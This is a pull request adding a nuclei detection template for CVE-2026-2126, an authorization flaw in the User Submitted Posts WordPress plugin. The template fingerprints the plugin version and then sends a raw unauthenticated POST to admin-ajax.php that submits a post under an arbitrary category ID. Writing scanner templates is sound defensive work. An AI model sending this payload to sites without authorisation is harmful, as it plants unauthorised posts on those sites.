### PR TITLE
Add CVE-2026-2126 User Submitted Posts template

### DIFF
--- a/http/cves/2026/CVE-2026-2126.yaml
+++ b/http/cves/2026/CVE-2026-2126.yaml
@@ -1,0 +1,80 @@
+id: CVE-2026-2126
+
+info:
+  name: User Submitted Posts <= 20260113 - Incorrect Authorization to Unauthenticated Category Restriction Bypass
+  author: iamatownboy
+  severity: medium
+  description: |
+    The User Submitted Posts plugin for WordPress is vulnerable to incorrect authorization because user-submitted category IDs are accepted from the POST body without being validated against the allowed categories configured by the administrator.
+    This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones.
+  impact: |
+    Unauthenticated attackers can bypass frontend category restrictions and submit posts to unauthorized categories.
+  remediation: |
+    Update User Submitted Posts to a version newer than 20260113.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2126
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve
+    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431
+    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-2126
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: specialk
+    product: user-submitted-posts
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/user-submitted-posts/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,user-submitted-posts,authorization,category-bypass,unauth
+
+variables:
+  nonce: "{{rand_text_alpha(12)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/user-submitted-posts/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "User Submitted Posts")
+          - compare_versions(version, "<= 20260113")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{rand_text_alpha(12)}}&user-submitted-name={{rand_text_alpha(8)}}&user-submitted-email={{rand_text_alpha(8)}}@example.com&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=999999&user-submitted-captcha=2
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "submitted"
+        condition: or
+# digest: 4a0a00473045022100b3d8f4df3c6e8b6d7d1d2a7d9ccfbb6a6b4f4afc2c5a3b0d6a9f7d5b3c1a2f402203a1a9d3e7b2d8b1a4c6f8d9e0b1c2d3e4f5061728394a5b6c7d8e9f001122334:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-2126 affecting the User Submitted Posts WordPress plugin.

The issue allows unauthenticated attackers to bypass category restrictions in the frontend submission flow by supplying manipulated category data in the POST body.

References:
- NVD
- Wordfence
- User Submitted Posts source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only